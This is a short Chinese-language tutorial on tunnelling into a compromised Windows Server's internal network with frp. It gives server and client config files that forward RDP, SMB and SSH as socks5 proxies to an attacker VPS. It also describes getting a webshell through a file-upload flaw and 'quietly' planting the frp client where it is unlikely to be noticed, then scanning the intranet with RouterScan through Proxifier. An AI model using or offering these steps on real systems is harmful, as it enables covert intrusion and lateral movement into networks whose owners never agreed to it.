frp内网穿透
vps跳板机是云服务器linux ,ip:154.12.88.x
靶机是windows server 2012,ip:124.222.180.x
1.服务端配置
配置frps.ini
[common]
bind_port = 7000
dashboard_port = 7500
token = 12345678
dashboard_user = admin
dashboard_pwd = admin
vhost_http_port = 10080
vhost_https_port = 10443
启动frp服务端
浏览器访问:vps-ip:port-154.12.88.197:7500,服务面板,出现以下界面证明服务端启动成功
2. 客户端配置
get WebShell
也就是靶机/被攻击的机器
首先需要获取到靶机的shell
比如当前靶机有一个上传文件的地方,通过上传马儿,getshell
找个不容易被发现的地方,悄悄的将frp客户端上传到靶机😁
配置frpc.ini
[common]
server_addr = 154.12.88.197
server_port = 7000
token = 12345678
[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 7001
plugin=socks5
[smb]
type = tcp
local_ip = 127.0.0.1
local_port = 445
remote_port = 7002
plugin=socks5
# 如果被控机是linux则使用以下配置
[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 7003
plugin=socks5
启动frp客户端
启动成功,去控制面板查看,发现已有三个服务启动
3. 启动Proxifier
配置–>代理服务–>新增
配置文件–>代理规则–>将RouterScan带进去,ok
4. 启动RouterScan
扫描靶机的地址,即内网地址10.0.16.11,在Proxifier中可查看到流量
5. 浏览器访问
浏览器访问RouterScan扫出的内网东西,如:http://10.0.16.11/,即可访问被控机的内网服务